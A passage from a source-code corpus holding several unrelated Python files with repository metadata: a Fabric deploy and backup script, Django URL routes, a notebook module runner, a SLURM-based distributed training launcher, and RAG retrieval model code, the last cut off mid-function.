        if filename in GlobalConfig.source_directories:
            upload_directory(filename)
        else:
            if filename in GlobalConfig.source_filenames:
                file_path_format = 'src/{}'
            elif filename in GlobalConfig.meta_filenames:
                file_path_format = '{}'
            else:
                # Bug fix: the f-string previously contained a literal
                # placeholder and never interpolated the offending filename.
                raise invoke.ParseError(f'Filename "{filename}" is not registered')
            upload_file(file_path_format, filename)
    else:
        for name in GlobalConfig.source_filenames:
            upload_file('src/{}', name)
        for name in GlobalConfig.meta_filenames:
            upload_file('{}', name)
        for directory in GlobalConfig.source_directories:
            upload_directory(directory)
@fabric.task(pre=[configure], hosts=[GlobalConfig.host], help={'filename': 'An optional filename to deploy to the server'})
def deploy(connection: fabric.Connection, filename: typing.Optional[str] = None) -> None:
    """Upload files, then install runtime dependencies with poetry on the server."""
    upload(connection, filename)
    with connection.cd(GlobalConfig.project_name):
        # pyenv supplies the interpreter; PATH is extended so poetry resolves.
        execute(connection, 'eval "$(pyenv init --path)" && poetry install --no-dev', {
            'PATH': '$HOME/.pyenv/bin:$HOME/.poetry/bin:$PATH'
        })
@fabric.task(pre=[configure], hosts=[GlobalConfig.host], help={'filename': 'The filename to backup locally from the server'})
def backup(connection: fabric.Connection, filename: str) -> None:
    """Download ``filename`` from the remote project into a timestamped local copy."""
    current_date = datetime.datetime.now().strftime(src.constants.GENERIC_DATE_FORMAT)
    name, extension = os.path.splitext(filename)
    with connection.cd(GlobalConfig.project_name):
        # Bug fix: the remote path previously contained the literal text
        # "(unknown)" instead of interpolating the requested filename.
        connection.get(f'{GlobalConfig.project_name}/{filename}', f'backup_{name}_{current_date}{extension}')
@fabric.task(pre=[configure], hosts=[GlobalConfig.host])
def backup_db(context: fabric.Connection) -> None:
    """Convenience task: back up the bot's SQLite database file."""
    backup(context, 'file_convert.sqlite')
| revolter/FileConvertBot | fabfile.py | fabfile.py | py | 5,563 | python | en | code | 45 | github-code | 1 | [
{
"api_name": "configparser.ConfigParser",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "os.path.expanduser",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 52,
"usage_type": "attribute"
},
{
"api_name": "configparse... |
18780622614 | from django.urls import path
from . import views
# Namespace for reverse() lookups, e.g. reverse('quote:new_quote').
app_name = 'quote'
# Routes for the quote workflow: building a quote, scheduling, addresses,
# checkout/receipt, saved-quote management and account pages.
urlpatterns = [
    path('', views.quote_page,),
    path('new', views.quote_page, name="new_quote"),
    path('schedule', views.schedule, name="schedule"),
    path('scheduling', views.scheduling, name="scheduling"),
    path('address', views.address, name="address"),
    path('setaddress', views.setaddress, name="setaddress"),
    path('revieworder', views.revieworder, name="revieworder"),
    path('submitorder', views.submitorder, name="submitorder"),
    path('receipt', views.receipt, name="receipt"),
    path('billing', views.billing, name="billing"),
    path('clear', views.clear_quote, name="clear_quote"),
    path('save', views.save, name="save_quote"),
    path('saving', views.saving, name="saving_quote"),
    path('savedquotes', views.savedquotes, name="savedquotes"),
    path('delete/<int:quoteID>', views.destroyQuote, name="destroyQuote"),
    path('edit/<int:quoteID>', views.editquote, name="edit_quote"),
    path('myaccount', views.account, name="account"),
    path('manage_address', views.manage_address, name="manage_address"),
    # AJAX to select a service and put it in session and then to table
    path('pickitem/<int:itemID>', views.pick_item, name="pickitem"),
    path('updateitem/<int:itemID>/remove', views.remove_item, name="removeitem"),
    path('updateitem/<int:itemID>', views.update_item, name="updateitem"),
    path('updateitem/package/<str:package>/<int:itemID>', views.update_item_package, name="updateitempackage"),
    path('updatequotetable', views.update_quote_table, name="updateQuoteTable")
]
| kozort/convertaquote | convertaquote_proj/quote_app/urls.py | urls.py | py | 1,637 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "django.urls.path",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
... |
13298319226 | from os import environ as env
from tempfile import NamedTemporaryFile
from .papermill import execute
from . import gsmo
from utz import cd, sh
class Modules:
    """Runs a set of notebook-based modules, honoring run/skip allowlists.

    Exactly one of ``run`` (allowlist) or ``skip`` (denylist) may be given,
    either as a list or a comma-separated string. ``conf`` maps module name
    to default keyword arguments for that module's notebook execution.
    """
    def __init__(self, run=None, skip=None, conf=None):
        if isinstance(run, str): run = run.split(',')
        if isinstance(skip, str): skip = skip.split(',')
        if run is not None and skip is not None:
            raise RuntimeError('Specify at most one of {run,skip}: (%s, %s)' % (run, skip))
        self.runs = run
        self.skips = skip
        self.conf = conf or {}
    def run(self, module, nb='run.ipynb', out='nbs', dind=None, *args, **kwargs):
        """Execute one module's notebook (directly or via gsmo docker-in-docker)
        inside the module directory, then git-add and git-commit the module."""
        if self.skips and module in self.skips:
            print(f'Module {module} marked as "skip"; skipping')
            return
        if self.runs and module not in self.runs:
            print(f'Module {module} not marked as "run"; skipping')
            return
        # NOTE(review): .get() returns the stored dict itself, so update()
        # mutates self.conf[module] across calls — confirm this is intended.
        module_kwargs = self.conf.get(module, {})
        module_kwargs.update(kwargs)
        with cd(module):
            print(f'Running module: {module}')
            if dind is not False:
                with NamedTemporaryFile() as tmp:
                    with open(tmp.name,'w') as f:
                        import yaml
                        # NOTE(review): dumps kwargs, not module_kwargs — the
                        # per-module conf defaults are ignored on the gsmo
                        # (docker) path; confirm whether that is intended.
                        yaml.safe_dump(kwargs, f, sort_keys=False)
                    cmd = []
                    if 'GSMO_IMAGE' in env:
                        cmd += ['-i',env['GSMO_IMAGE']]
                    # -I run: input notebook name, -o: output dir, -Y: YAML params.
                    cmd += ['-I','run','-o',out,'-x',nb,'-Y',tmp.name]
                    gsmo.main(*cmd)
            else:
                execute(
                    nb,
                    out,
                    *args,
                    **module_kwargs,
                )
        # Record the module's outputs in git.
        sh('git','add',module)
        sh('git','commit','-m',module)
    def __call__(self, *args, **kwargs): return self.run(*args, **kwargs)
| runsascoded/gsmo | gsmo/modules.py | modules.py | py | 1,856 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "utz.cd",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "tempfile.NamedTemporaryFile",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "yaml.safe_dump",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "os.environ",
"l... |
31971486845 | import torch.nn as nn
import torch.multiprocessing as mp
from torch.utils.data import Dataset, DataLoader
from torch.utils.data.distributed import DistributedSampler
import argparse
from lib.utils.file import bool_flag
from lib.utils.distributed import init_dist_node, init_dist_gpu, get_shared_folder
from lib.utils.flatten import flatten_dict
import submitit, random, sys
from pathlib import Path
def parse_args():
    """Parse command-line arguments, optionally merged with a YAML config file.

    Values from the ``--cfg`` file fill in any option that was NOT passed
    explicitly on the command line; explicit command-line flags always win.

    Returns:
        argparse.Namespace with all options (unset ones default to None/False).
    """
    parser = argparse.ArgumentParser(description='Template')
    parser.add_argument('--cfg', type=str, help='Configuration file')
    # PATHS
    paths_group = parser.add_argument_group("PATHS")
    paths_group.add_argument('--data', type=str, help='Path to raw dataset directory')
    paths_group.add_argument('--processed_data', type=str, help='Path to processed dataset directory')
    paths_group.add_argument('--processed_pattern', type=str, help='Pattern for processed data files')
    paths_group.add_argument('--genuine_pattern', type=str, help='Pattern for genuine data files')
    paths_group.add_argument('--simulated_pattern', type=str, help='Pattern for simulated data files')
    paths_group.add_argument('--out', type=str, help='Path to out directory')
    # GENERAL
    general_group = parser.add_argument_group("GENERAL")
    general_group.add_argument('--model', type=str, help='Model name')
    general_group.add_argument('--reset', action='store_true', help='Reset saved model logs and weights')
    general_group.add_argument('--tb', action='store_true', help='Start TensorBoard')
    general_group.add_argument('--gpus', type=str, help='GPUs list, only works if not on slurm')
    general_group.add_argument('--k_neighbors', type=int, help='Number of neighbors to consider in k-NN algorithm')
    # Model
    model_group = parser.add_argument_group("Model")
    model_group.add_argument('--num_layers', type=int, help='Number of layers')
    model_group.add_argument('--hidden_dim', type=int, help='Number of nodes in the hidden layer.')
    # Dataset
    dataset_group = parser.add_argument_group("Dataset")
    dataset_group.add_argument('--dataset', type=str, help='Dataset to choose')
    dataset_group.add_argument('--batch_per_gpu', type=int, help='Batch size per gpu')
    dataset_group.add_argument('--shuffle', action='store_true', help='Shuffle dataset')
    dataset_group.add_argument('--workers', type=int, help='Number of workers')
    dataset_group.add_argument('--keys', type=str, nargs='+', help='Columns to be used as data features')
    # Architecture
    architecture_group = parser.add_argument_group("Architecture")
    architecture_group.add_argument('--arch', type=str, help='Architecture to choose')
    # Trainer
    trainer_group = parser.add_argument_group("Trainer")
    trainer_group.add_argument('--trainer', type=str, help='Trainer to choose')
    trainer_group.add_argument('--epochs', type=int, help='Number of epochs')
    trainer_group.add_argument('--save_every', type=int, help='Save model every n epochs')
    trainer_group.add_argument('--fp16', action='store_true', help='Use fp16')
    # Optimization
    optimization_group = parser.add_argument_group("Optimization")
    optimization_group.add_argument('--optimizer', type=str, help='Optimizer to choose between "adam", "sgd", and "adagrad"')
    optimization_group.add_argument('--lr_start', type=float, help='Learning rate start')
    optimization_group.add_argument('--lr_end', type=float, help='Learning rate end')
    optimization_group.add_argument('--lr_warmup', type=int, help='Learning rate warmup')
    # SLURM
    slurm_group = parser.add_argument_group("SLURM")
    slurm_group.add_argument('--slurm', action='store_true', help='Use slurm')
    slurm_group.add_argument('--slurm_ngpus', type=int, help='Number of gpus per node')
    slurm_group.add_argument('--slurm_nnodes', type=int, help='Number of nodes')
    slurm_group.add_argument('--slurm_nodelist', type=str, help='Node list')
    slurm_group.add_argument('--slurm_partition', type=str, help='Partition')
    slurm_group.add_argument('--slurm_timeout', type=int, help='Timeout')
    args = parser.parse_args()
    # === Read CFG File === #
    if args.cfg:
        with open(args.cfg, 'r') as f:
            import ruamel.yaml as yaml
            yml = yaml.safe_load(f)
        # update values from cfg file only if not passed in cmdline.
        # Bug fix: the old `c[1:]` stripped only ONE leading dash, so `--epochs`
        # became '-epochs' and never matched the option name — the cfg file
        # silently overrode every explicitly-passed command-line value.
        cmd = [c.lstrip('-') for c in sys.argv if c.startswith('-')]
        for k,v in flatten_dict(yml):
            if k not in cmd:
                args.__dict__[k] = v
    return args
class SLURM_Trainer(object):
    """Picklable callable submitted to SLURM via submitit."""
    def __init__(self, args):
        self.args = args
    def __call__(self):
        # Runs on the allocated node: set up the distributed env, then train.
        # gpu=None — the per-process GPU is resolved inside the dist helpers.
        init_dist_node(self.args)
        train(None, self.args)
def main():
    """Entry point: launch training either on SLURM (via submitit) or locally
    with one spawned process per GPU."""
    args = parse_args()
    # Random ephemeral port for the distributed rendezvous.
    args.port = random.randint(49152,65535)
    if args.slurm:
        # Almost copy-paste from https://github.com/facebookresearch/deit/blob/main/run_with_submitit.py
        args.output_dir = get_shared_folder(args) / "%j"
        Path(args.output_dir).mkdir(parents=True, exist_ok=True)
        executor = submitit.AutoExecutor(folder=args.output_dir, slurm_max_num_timeout=30)
        # Same resource request either way; the account is only passed when set.
        if hasattr(args, "slurm_account"):
            executor.update_parameters(
                mem_gb=12*args.slurm_ngpus,
                gpus_per_node=args.slurm_ngpus,
                tasks_per_node=args.slurm_ngpus,
                cpus_per_task=2,
                nodes=args.slurm_nnodes,
                timeout_min=2800,
                slurm_partition=args.slurm_partition,
                account=args.slurm_account
            )
        else:
            executor.update_parameters(
                mem_gb=12*args.slurm_ngpus,
                gpus_per_node=args.slurm_ngpus,
                tasks_per_node=args.slurm_ngpus,
                cpus_per_task=2,
                nodes=args.slurm_nnodes,
                timeout_min=2800,
                slurm_partition=args.slurm_partition
            )
        if args.slurm_nodelist:
            executor.update_parameters(slurm_additional_parameters = {"nodelist": f'{args.slurm_nodelist}' })
        executor.update_parameters(name=args.model)
        trainer = SLURM_Trainer(args)
        job = executor.submit(trainer)
        print(f"Submitted job_id: {job.job_id}")
    else:
        # Local run: one process per GPU on this node.
        init_dist_node(args)
        mp.spawn(train, args = (args,), nprocs = args.ngpus_per_node)
def train(gpu, args):
    """Per-process training worker: builds the distributed dataset/model/loss/
    optimizer (all resolved dynamically from args) and runs the trainer."""
    # === SET ENV === #
    init_dist_gpu(gpu, args)
    # === DATA === #
    # Dynamically import lib.datasets.<args.dataset>.get_dataset.
    get_dataset = getattr(__import__("lib.datasets.{}".format(args.dataset), fromlist=["get_dataset"]), "get_dataset")
    dataset = get_dataset(args)
    sampler = DistributedSampler(dataset, shuffle=args.shuffle, num_replicas = args.world_size, rank = args.rank, seed = 31)
    loader = DataLoader(dataset=dataset,
                        sampler = sampler,
                        batch_size=args.batch_per_gpu,
                        num_workers= args.workers,
                        pin_memory = True,
                        drop_last = True
                        )
    print(f"Data loaded")
    # === MODEL === #
    get_model = getattr(__import__("lib.arch.{}".format(args.arch), fromlist=["get_model"]), "get_model")
    setattr(args, "input_dim", dataset.num_node_features)
    # NOTE(review): "outpup_dim" looks like a typo for "output_dim", but
    # get_model may read this exact attribute name — confirm before renaming.
    setattr(args, "outpup_dim", dataset.num_classes)
    setattr(args, "activation_function", nn.functional.relu)
    model = get_model(args).cuda(args.gpu)
    model = nn.SyncBatchNorm.convert_sync_batchnorm(model) # use if model contains batchnorm.
    model = nn.parallel.DistributedDataParallel(model, device_ids=[args.gpu])
    # === LOSS === #
    setattr(args, "loader", loader)
    from lib.core.loss import get_loss
    loss = get_loss(args).cuda(args.gpu)
    # === OPTIMIZER === #
    from lib.core.optimizer import get_optimizer
    optimizer = get_optimizer(model, args)
    # === TRAINING === #
    Trainer = getattr(__import__("lib.trainers.{}".format(args.trainer), fromlist=["Trainer"]), "Trainer")
    Trainer(args, loader, model, loss, optimizer).fit()
if __name__ == "__main__":
main()
| Samuele-Colombo/transient_detection_distributed | train.py | train.py | py | 8,094 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "ruamel.yaml.safe_load",
"line_number": 83,
"usage_type": "call"
},
{
"api_name": "ruamel.yaml",
"line_number": 83,
"usage_type": "name"
},
{
"api_name": "sys.argv",
... |
73247744995 | from typing import Optional, List
import numpy as np
import torch
import torch.nn as nn
from transformers import RagSequenceForGeneration, AutoModel, AutoConfig, RagRetriever, BatchEncoding
from transformers.models.dpr.modeling_dpr import DPRQuestionEncoderOutput
from distributed_pytorch_retriever import RagPyTorchDistributedRetriever
class RobertaRetriever(nn.Module):
    """Question encoder: a pretrained transformer whose [CLS] representation is
    passed through a Linear+LayerNorm projection, exposed with a DPR-compatible
    forward() so it can replace a RAG question encoder."""
    def __init__(self, model_name):
        super().__init__()
        config = AutoConfig.from_pretrained(model_name)
        self.encoder = AutoModel.from_pretrained(model_name)
        self.project = nn.Sequential(nn.Linear(config.hidden_size, config.hidden_size),
                                     nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps))
    def encode_seq(self, input_ids, mask):
        # [0] is the last hidden state; take the first ([CLS]) token.
        cls_rep = self.encoder(input_ids, mask)[0][:, 0, :]
        vector = self.project(cls_rep)
        return vector
    def forward(self,
                input_ids: Optional[torch.Tensor] = None,
                attention_mask: Optional[torch.Tensor] = None,
                token_type_ids: Optional[torch.Tensor] = None,
                inputs_embeds: Optional[torch.Tensor] = None,
                output_attentions=None,
                output_hidden_states=None,
                return_dict=None,):
        # Unused parameters are accepted only for DPR signature compatibility.
        pooled = self.encode_seq(input_ids, attention_mask)
        if not return_dict:
            return [pooled]
        return DPRQuestionEncoderOutput(pooler_output=pooled, hidden_states=None, attentions=None) # TODO: replace none
def load_saved(model, path, exact=True):
    """Load a checkpoint into ``model``, normalizing common key prefixes.

    Strips ``rag.question_encoder.`` and ``module.`` (DataParallel) prefixes
    from state-dict keys. With ``exact=False``, keys that do not exist on the
    model are dropped instead of being passed through.

    Args:
        model: the ``nn.Module`` to populate (updated in place).
        path: checkpoint file readable by ``torch.load``.
        exact: keep all keys (True) or only those present on the model (False).

    Returns:
        The same ``model`` instance.
    """
    try:
        state_dict = torch.load(path)
    except Exception:
        # Checkpoint may have been saved with GPU tensors; retry on CPU.
        state_dict = torch.load(path, map_location=torch.device('cpu'))

    def _normalize(key):
        # Strip wrapper prefixes introduced by RAG and by nn.DataParallel.
        if key.startswith('rag.question_encoder.'):
            return key[21:]
        if key.startswith('module.'):
            return key[7:]
        return key

    if exact:
        state_dict = {_normalize(k): v for (k, v) in state_dict.items()}
    else:
        # Hoisted out of the comprehension: state_dict() is not free.
        model_keys = model.state_dict()
        state_dict = {_normalize(k): v for (k, v) in state_dict.items() if _normalize(k) in model_keys}
    model.load_state_dict(state_dict, strict=False)  # TODO: embeddings.position_ids missing
    return model
class MyRagRetriever(RagRetriever):
    """RagRetriever variant whose __call__ accepts optional raw question
    strings; when given, they are used (with ``[MASK]`` mapped to ``<mask>``)
    instead of re-decoding the tokenized questions."""
    def __call__(
        self,
        question_input_ids: List[List[int]],
        question_hidden_states: np.ndarray,
        question_strings: List[str]=None,
        prefix=None,
        n_docs=None,
        return_tensors=None,
    ) -> BatchEncoding:
        n_docs = n_docs if n_docs is not None else self.n_docs
        prefix = prefix if prefix is not None else self.config.generator.prefix
        retrieved_doc_embeds, doc_ids, docs = self.retrieve(question_hidden_states, n_docs)
        if question_strings is None:
            input_strings = self.question_encoder_tokenizer.batch_decode(question_input_ids, skip_special_tokens=True)
        else:
            input_strings = [s.replace('[MASK]', '<mask>') for s in question_strings] # TODO: make it more robust to different models
        # Concatenate each question with its retrieved docs for the generator.
        context_input_ids, context_attention_mask = self.postprocess_docs(
            docs, input_strings, prefix, n_docs, return_tensors=return_tensors
        )
        return BatchEncoding(
            {
                "context_input_ids": context_input_ids,
                "context_attention_mask": context_attention_mask,
                "retrieved_doc_embeds": retrieved_doc_embeds,
                "doc_ids": doc_ids,
            },
            tensor_type=return_tensors,
        )
class MyRagPyTorchDistributedRetriever(RagPyTorchDistributedRetriever):
    """Distributed counterpart of MyRagRetriever.

    NOTE(review): __call__ is an exact copy of MyRagRetriever.__call__; a
    shared mixin would remove the duplication — left as-is here.
    """
    def __call__(
        self,
        question_input_ids: List[List[int]],
        question_hidden_states: np.ndarray,
        question_strings: List[str]=None,
        prefix=None,
        n_docs=None,
        return_tensors=None,
    ) -> BatchEncoding:
        n_docs = n_docs if n_docs is not None else self.n_docs
        prefix = prefix if prefix is not None else self.config.generator.prefix
        retrieved_doc_embeds, doc_ids, docs = self.retrieve(question_hidden_states, n_docs)
        if question_strings is None:
            input_strings = self.question_encoder_tokenizer.batch_decode(question_input_ids, skip_special_tokens=True)
        else:
            input_strings = [s.replace('[MASK]', '<mask>') for s in question_strings] # TODO: make it more robust to different models
        # Concatenate each question with its retrieved docs for the generator.
        context_input_ids, context_attention_mask = self.postprocess_docs(
            docs, input_strings, prefix, n_docs, return_tensors=return_tensors
        )
        return BatchEncoding(
            {
                "context_input_ids": context_input_ids,
                "context_attention_mask": context_attention_mask,
                "retrieved_doc_embeds": retrieved_doc_embeds,
                "doc_ids": doc_ids,
            },
            tensor_type=return_tensors,
        )
class MemoryBank(nn.Module):
    """Fixed-size FIFO bank of embeddings (MoCo-style negative queue).

    Batches written with :meth:`put` fill the bank at a moving pointer and
    wrap around once full. The queue buffer is allocated lazily from the
    first batch when ``emb_size`` is not given at construction time.
    """
    def __init__(self, bank_size: int, emb_size: int = None):
        super().__init__()
        self.bank_size = bank_size
        self.emb_size = emb_size
        if emb_size is not None:
            self.register_buffer('queue', torch.randn(bank_size, emb_size))
        # Write pointer plus a flag recording whether every slot holds real
        # data (i.e. the queue has been completely filled at least once).
        self.register_buffer('ptr', torch.zeros(1, dtype=torch.long))
        self.register_buffer('is_full', torch.zeros(1, dtype=bool))

    @property
    def is_initialized(self):
        # True once the queue buffer exists (from __init__ or the first put).
        return hasattr(self, 'queue')

    @torch.no_grad()
    def put(self,
            embeddings: torch.FloatTensor):  # (bs, emb_size)
        """Append a batch of embeddings, overwriting the oldest entries."""
        bs, es = embeddings.size()
        ptr = int(self.ptr)
        if not self.is_initialized:
            # Lazily allocate on the same device as the incoming batch.
            self.emb_size = es
            self.register_buffer('queue', torch.randn(self.bank_size, self.emb_size).to(embeddings.device))
        # update queue
        if ptr + bs > self.bank_size:  # past the end of the queue: wrap around
            self.queue[ptr:, :] = embeddings[:self.bank_size - ptr]
            self.queue[:ptr + bs - self.bank_size, :] = embeddings[self.bank_size - ptr:]
            self.is_full = self.is_full | True
        else:
            self.queue[ptr:ptr + bs, :] = embeddings
            if ptr + bs == self.bank_size:
                # Bug fix: an exact fill reaches the end without wrapping; the
                # bank is full even though the pointer resets to zero. Without
                # this, get() returned an empty slice after an exact fill.
                self.is_full = self.is_full | True
        # move pointer
        self.ptr[0] = (ptr + bs) % self.bank_size

    @torch.no_grad()
    def get(self):
        """Return the valid entries: the whole queue once full, else the
        written prefix. Raises ValueError if nothing was ever put."""
        if not self.is_initialized:
            raise ValueError('queue not initialized')
        if not self.is_full:
            return self.queue[:self.ptr]  # (<bank_size, emb_size)
        return self.queue
class MyRagSequenceForGeneration(RagSequenceForGeneration):
    def set_additional_retrievers(self, retrievers: List):
        # Extra retrievers consulted by retrieve_from_multiple besides self.retriever.
        self._retrievers = retrievers
    def retrieve_from_multiple(self, *args, **kwargs):
        """Query every registered retriever and keep the overall top-n_docs
        documents ranked by dot-product score against the question embedding.

        Falls back to the single default retriever when no additional ones
        were set. args/kwargs follow the retriever __call__ signature:
        args[0] = question_input_ids, args[1] = question hidden states (numpy).
        """
        if not hasattr(self, '_retrievers'):
            return self.retriever(*args, **kwargs)
        all_retrievers = [self.retriever] + self._retrievers
        question_hidden_states = torch.tensor(args[1])
        n_docs = kwargs['n_docs']
        cii_li = []
        cam_li = []
        rde_li = []
        di_li = []
        ds_li = []
        # collect retrieved results from all retrievers
        for retriever in all_retrievers:
            retriever_outputs = retriever(*args, **kwargs)
            cii, cam, rde, di = (
                retriever_outputs['context_input_ids'],  # (batch_size * n_docs, seq_len)
                retriever_outputs['context_attention_mask'],  # (batch_size * n_docs, seq_len)
                retriever_outputs['retrieved_doc_embeds'],  # (batch_size, n_docs, emb_size)
                retriever_outputs['doc_ids']  # (batch_size, n_docs)
            )
            cii_li.append(cii.view(-1, n_docs, cii.size(-1)))
            cam_li.append(cam.view(-1, n_docs, cam.size(-1)))
            rde_li.append(rde)
            di_li.append(di)
            # Score each retrieved doc against its question embedding.
            doc_scores = torch.bmm(question_hidden_states.unsqueeze(1), rde.to(question_hidden_states).transpose(1, 2)).squeeze(1)
            ds_li.append(doc_scores)
        # merge results
        cii = torch.cat(cii_li, 1)
        cam = torch.cat(cam_li, 1)
        rde = torch.cat(rde_li, 1)
        di = torch.cat(di_li, 1)
        doc_scores = torch.cat(ds_li, 1)
        # sort by scores and select
        doc_scores, topk_ind = torch.topk(doc_scores, n_docs, dim=1)
        cii = torch.gather(cii, 1, topk_ind.unsqueeze(-1).repeat(1, 1, cii.size(-1))).view(-1, cii.size(-1))
        cam = torch.gather(cam, 1, topk_ind.unsqueeze(-1).repeat(1, 1, cam.size(-1))).view(-1, cam.size(-1))
        rde = torch.gather(rde, 1, topk_ind.unsqueeze(-1).repeat(1, 1, rde.size(-1)))
        di = torch.gather(di, 1, topk_ind)
        return {'context_input_ids': cii, 'context_attention_mask': cam, 'retrieved_doc_embeds': rde, 'doc_ids': di}
@torch.no_grad()
def generate(
self,
input_ids: Optional[torch.LongTensor] = None,
attention_mask: Optional[torch.LongTensor] = None,
context_input_ids=None,
context_attention_mask=None,
doc_scores=None,
do_deduplication=None, # defaults to True
num_return_sequences=None, # defaults to 1
num_beams=None, # defaults to 1
n_docs=None,
**model_kwargs
):
"""
Implements RAG sequence "thorough" decoding. Read the :meth:`~transformers.PreTrainedModel.generate``
documentation for more information on how to set other generate input parameters.
Args:
input_ids (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
The sequence used as a prompt for the generation. If :obj:`input_ids` is not passed, then
:obj:`context_input_ids` has to be provided.
attention_mask (:obj:`torch.Tensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Mask to avoid performing attention on padding token indices. Mask values selected in ``[0, 1]``:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
`What are attention masks? <../glossary.html#attention-mask>`__
context_input_ids (:obj:`torch.LongTensor` of shape :obj:`(batch_size * config.n_docs, config.max_combined_length)`, `optional`, returned when `output_retrieved=True`):
Input IDs post-processed from the retrieved documents and the question encoder input_ids by the
retriever.
context_attention_mask (:obj:`torch.LongTensor` of shape :obj:`(batch_size * config.n_docs, config.max_combined_length)`, `optional`, returned when `output_retrieved=True`):
Attention mask post-processed from the retrieved documents and the question encoder :obj:`input_ids` by
the retriever.
If the model is not initialized with a ``retriever`` or ``input_ids`` is not given,
:obj:`context_input_ids` and :obj:`context_attention_mask` have to be provided to the forward pass.
They are returned by :meth:`~transformers.RagRetriever.__call__`.
doc_scores (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, config.n_docs)`):
Score between each retrieved document embeddings (see :obj:`retrieved_doc_embeds`) and
:obj:`question_encoder_last_hidden_state`.
If the model is not initialized with a ``retriever`` or ``input_ids`` is not given, :obj:`doc_scores`
has to be provided to the forward pass. :obj:`doc_scores` are returned by
:meth:`~transformers.RagRetriever.__call__`.
do_deduplication (:obj:`bool`, `optional`):
Whether or not to deduplicate the generations from different context documents for a given input. Has
to be set to :obj:`False` if used while training with distributed backend.
num_return_sequences(:obj:`int`, `optional`, defaults to 1):
The number of independently computed returned sequences for each element in the batch. Note that this
is not the value we pass to the ``generator``'s `:func:`~transformers.PreTrainedModel.generate``
function, where we set ``num_return_sequences`` to :obj:`num_beams`.
num_beams (:obj:`int`, `optional`, defaults to 1):
Number of beams for beam search. 1 means no beam search.
n_docs (:obj:`int`, `optional`, defaults to :obj:`config.n_docs`)
Number of documents to retrieve and/or number of documents for which to generate an answer.
kwargs:
Additional kwargs will be passed to :meth:`~transformers.PreTrainedModel.generate`.
Return:
:obj:`torch.LongTensor` of shape :obj:`(batch_size * num_return_sequences, sequence_length)`: The generated
sequences. The second dimension (sequence length) is either equal to :obj:`max_length` or shorter if all
batches finished early due to the :obj:`eos_token_id`.
"""
n_docs = n_docs if n_docs is not None else self.config.n_docs
do_deduplication = do_deduplication if do_deduplication is not None else self.config.do_deduplication
num_doc_return_sequences = (
num_return_sequences if num_return_sequences is not None else self.config.num_return_sequences
)
num_beams = num_beams if num_beams is not None else self.config.num_beams
assert (
input_ids is not None or context_input_ids is not None
), " At least one of input_ids or context_input_ids must be given"
if self.retriever is not None and context_input_ids is None:
question_hidden_states = self.question_encoder(input_ids, attention_mask=attention_mask)[0]
context_input_ids = self.retriever(
input_ids,
question_hidden_states.cpu().detach().to(torch.float32).numpy(),
prefix=self.generator.config.prefix,
n_docs=n_docs,
return_tensors="pt",
)["context_input_ids"]
# set to correct device
context_input_ids = context_input_ids.to(input_ids)
hypos = []
logprobs = []
model_kwargs["num_beams"] = num_beams
model_kwargs["num_return_sequences"] = num_beams
model_kwargs["attention_mask"] = None
batch_size = input_ids.shape[0] if input_ids is not None else context_input_ids.shape[0] // n_docs
for index in range(batch_size):
# first, generate beams from documents:
generator_input_ids = context_input_ids[index * n_docs: (index + 1) * n_docs] # (n_docs, max_len)
output_sequences = self.generator.generate(
generator_input_ids,
**model_kwargs,
) # n_docs * n_beam, tgt_len
if do_deduplication:
# do_deduplication, max_output_len
output_sequences = torch.stack(list({str(k.tolist()): k for k in output_sequences}.values()))
num_candidates = output_sequences.shape[
0
] # after deduplication, this number can be less than n_docs*n_beam
# then, run model forwards to get nll scores:
if input_ids is not None:
new_input_ids = input_ids[index: index + 1].repeat(num_candidates, 1)
outputs = self(new_input_ids, labels=output_sequences, exclude_bos_score=True)
else: # input_ids is None, need context_input_ids/mask and doc_scores
assert (
context_attention_mask is not None
), "Make sure that `context_attention_mask` are passed, if no `input_ids` is set. Alternatively, you can set a retriever using the `set_retriever(...)` function."
assert (
doc_scores is not None
), "Make sure that `doc_scores` are passed, if no `input_ids` is set. Alternatively, you can set a retriever using the `set_retriever(...)` function."
individual_input_ids = generator_input_ids.repeat(
num_candidates, 1
) # (num_candidates*n_docs, max_len)
individual_attention_mask = context_attention_mask[index * n_docs: (index + 1) * n_docs]
individual_attention_mask = individual_attention_mask.repeat(num_candidates, 1)
individual_doc_scores = doc_scores[index: (index + 1), :] # doc_scores.shape = [batch, n_docs]
individual_doc_scores = individual_doc_scores.repeat(num_candidates, 1) # [num_candidates, n_docs]
outputs = self(
context_input_ids=individual_input_ids,
context_attention_mask=individual_attention_mask,
doc_scores=individual_doc_scores,
labels=output_sequences,
exclude_bos_score=True,
)
lps, top_cand_inds = (-outputs["loss"]).topk(num_doc_return_sequences)
# add hypothesis
hypos.append(output_sequences[top_cand_inds])
logprobs.append(lps)
logprobs = torch.cat(logprobs, 0)
return self._cat_and_pad(hypos, pad_token_id=self.config.generator.pad_token_id), logprobs
    @staticmethod
    def load_question_encoder(rag_model, question_encoder_path: str):
        """Replace rag_model's question encoder with a RobertaRetriever whose
        weights are loaded (non-strictly) from the given checkpoint."""
        model = RobertaRetriever('roberta-base')
        model = load_saved(model, question_encoder_path, exact=False)
        rag_model.rag.question_encoder = model
    def get_nll(
        self, seq_logits, doc_scores, target, reduce_loss=False, epsilon=0.0, exclude_bos_score=False, n_docs=None
    ):
        """RAG-sequence marginalized NLL with label smoothing.

        Extends the upstream implementation to accept ``doc_scores`` computed
        over the whole batch (optionally padded with memory-bank columns), in
        which case each example's own n_docs block is selected from the
        diagonal before marginalization.
        """
        # shift tokens left
        target = torch.cat(
            [target[:, 1:], target.new(target.shape[0], 1).fill_(self.config.generator.pad_token_id)], 1
        )
